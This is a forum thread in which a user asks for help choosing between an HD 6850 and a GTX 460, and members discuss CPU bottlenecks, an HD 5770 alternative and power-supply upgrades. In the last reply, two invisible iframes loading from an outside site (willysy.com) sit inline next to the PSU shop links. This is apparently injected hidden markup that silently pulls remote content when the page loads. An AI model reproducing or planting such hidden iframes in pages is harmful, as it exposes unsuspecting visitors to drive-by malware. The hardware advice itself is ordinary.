Graphic Cards Help me to choose the best card

Hello guys...TE Rocks!! I'm new to this forum...but after reading some threads & posts I think that this is the best place where I can solve all my queries. I'm planning to buy a decent graphics card which will allow me to play all the latest released games at my native resolution 1600x900 and at 60fps or over. But I'm very much confused which one to buy ATI or NVIDIA? I have planned for HD 6850 or GTX 460 but don't know which one is superior as I never used any high profile gaming card from any of these manufacturers. Also I don't have any plan right now to upgrade other parts of my computer except the GPU. Here is my current rig details:

Procy: Intel Dual Core E5300 @ 2.6 Ghz
MB: Intel Original DG31PR
RAM: 3GB (2+1)
GPU: ZOTAC NVIDIA 9400GT OC (42%)
HD: 160GB
RESOLUTION: 1600x900 (able to play games on 9400GT at 1280x720)

Here is my Windows 7 experience index:

nl3a4k.jpg

So guys plz let me know which one should fit best (HD 6850 or GTX 460) along with their latest prices. Thanks in advance.....:hap2:

Go for HD6850 but I do think that your processor will be a severe bottleneck. if you are not going upgrade your CPU/monitor etc, a HD5770 would be more than enough .

(1) which card help me to play games in 1920*1080 reselution?
(2) Does physx have no importance in games ?
above two are two threads in graphics card forum. u can take a decision after searching through it..................

I want to choose HD 6850 for a future proof but bottle neck OMG!! will I damage my system if I install HD 6850? How much fps will I get if I go with my current processor? I will play at 1600x900 with all high details...

^^ What is your SMPS for starters if you have some generic one sitting in your cabinet and you decide to put any-more load on it, it'll give up -- BADLY.

If you need a graphics card ASAP get a AMD HD 5770 as the HD 6850 will be bottle necked by your anemic CPU, the HD 5770 will be able to handle your gaming needs for at-least coming year, till then save up some money for the rest system to be overhauled.

Hey don't panic about anything,people here on TE will completely guide you till you get your right choice.

But till then you should keep patience and stop guessing things like bottlenecks,etc.

First of all let us know a)how much you are willing to spend?

b)What Brand and model of "power supply unit" (PSU) are you using?

c)What PC Cabinet or case brand are you using?

And about the gaming performance @ 1600 X 900 resolution,leave it upon us.We'll make it good enough for your eyes :)

dayanam29 said:
(1) which card help me to play games in 1920*1080 reselution?

(2) Does physx have no importance in games ?

above two are two threads in graphics card forum. u can take a decision after searching through it..................

Okay first DO NOT HIJACK threads Sir, ask the OP [original poster] for his permission to accommodate your query in the same functioning thread.

Next to answer your queries both the GTX 460 1GB and AMD HD 6850 1GB will perform at par @1920 x 1080 [full HD resolution with a bit of eye-candy], the nVidia card supports the proprietary PHYSX and you'll notice this will affect the eye-candy levels in certain PHYSX games (prominent among them Batman: Arkham Asylum), now the HD 6850 is no slouch and will give you better frame rates overall, but then you miss out on the PHYSX factor. So in the end it is your call. Power efficiency has been AMD's forte since HD 4*** series card.

Also the over-clockability of the nVidia GTX 460 1GB is much better than the AMD HD 6850. Here are some related links --

AnandTech - Bench - GPU11

GTX 460 vs HD 6850 - Graphics-Cards - Graphic-Displays

HD 6870 & HD 6850 vs. GTX 460 1GB: An Overclocking Study.

Hope this answers your queries.

Ameet148 said:
Hey don't panic about anything,people here on TE will completely guide you till you get your right choice.

But till then you should keep patience and stop guessing things like bottlenecks,etc.

First of all let us know a)how much you are willing to spend?

b)What Brand and model of "power supply unit" (PSU) are you using?

c)What PC Cabinet or case brand are you using?

And about the gaming performance @ 1600 X 900 resolution,leave it upon us.We'll make it good enough for your eyes :)

Okay...first of all right now I am just using a generic psu. But I know that I have to install more powerful PSU along with HD 6850. But as you guys specified the bottle neck issue, right now my question is, is my cpu totally incompatible to handle HD 6850 or the bottle neck issue can somehow be solved by the psu? If the ans is negative then which card should I go for to play healthy with healthy frame rates at my healthy resolution??? :)

^^ No if you want to get the best value currently upgrade your SMPS, later after saving up cash upgrade your set-up to the latest generation Intel Sandy-Bridge / AMD Bulldozer, depending on the budget you have and then add a graphics card as well, to accomplish this you must upgrade your SMPS minimum to the -- Corsair VX 450W ~ 3500/-.

subhasis005,do what ALPHA17 said.

Your first step is to have a good PSU.This will completely decide your future upgardes.

Second let us know your complete budget.From looking at the choice of your card it looks like you are having a budget of RS 11000/-,is that right?

Another thing is that you are stressing too much on framerates.What will you do with extra framerates which you won't be able to notice?

subhasis005 said:
Okay...first of all right now I am just using a generic psu. But I know that I have to install more powerful PSU along with HD 6850. But as you guys specified the bottle neck issue, right now my question is, is my cpu totally incompatible to handle HD 6850 or the bottle neck issue can somehow be solved by the psu? If the ans is negative then which card should I go for to play healthy with healthy frame rates at my healthy resolution??? :)

Bottleneck is because your CPU is less powerful when compared to HD6850 and you need right balance to fully utilize the card.

For example, I had Athlon 3200+ when I first purchased HD4770 and many new games (at that time) used to lag a bit. Then, when I upgraded to X2 7750 BE, everything was butter smooth. The reason here is that the CPU was not able to drive the GPU and it was getting stressed. A bottleneck won't damage h/w, it just makes the h/w underperform which may or may not effect the application.

And secondly, you don't even need a HD6850 to play at that resolution. You will be underutilizing your card till you upgrade your monitor to FullHD and then your CPU will be a bigger bottleneck for GPU. If you are thinking of future proofing, then by the time you upgrade your rig in the future, you may get a card as powerful as HD6850 inside 10k. So, do an incremental upgrade starting with PSU and then CPU, then the display and finally the GPU. If you just want a GPU right now, get HD5770. It is enough.

this should make you understand the concept of bottleneck: http://en.wikipedia.org/wiki/Bottleneck

ok fine guys...thank you all for your valuable suggestions. so can I play the upcoming games in 1600x900 resolution with full high details (specially AA) on HD 5770? If so how much frame rate will I get? Is HD 5770 same powerful as GTX 260?

is HD 5770 an outdated card? How long can I enjoy games in high resolution on that? I mean the upcoming games....and please suggest me a good psu to run HD 5770.

^^ The HD 5770 is a 1-1/2 year card, on the resolution you are saying it should soldier on for another 2 years, but for something more future-proof get the HD 6850 ~ 9500/-.
To run these cards you'll need a minimum of Seasonic S12II 430W ~ 3000/- TheITWares - One Stop for all Gizmos!<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>SeaSonic S12II 430 430W ATX12V V2.3/EPS12V 80 PLUS BRONZE Certified Active PFC Power Supply OR Corsair CX 400W ~ 2600/- TheITWares - One Stop for all Gizmos!<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>CORSAIR CMPSU-400CX 400W ATX12V V2.2 80 PLUS Certified SMPS , to have a bit more future-proofing for your SMPS recommend you get a Corsair VX 450W ~ 3500/-.

Also a head-to-head between a HD 6850 vs. HD 5770 ~ AnandTech - Bench - GPU11.

Hope this helps.

Back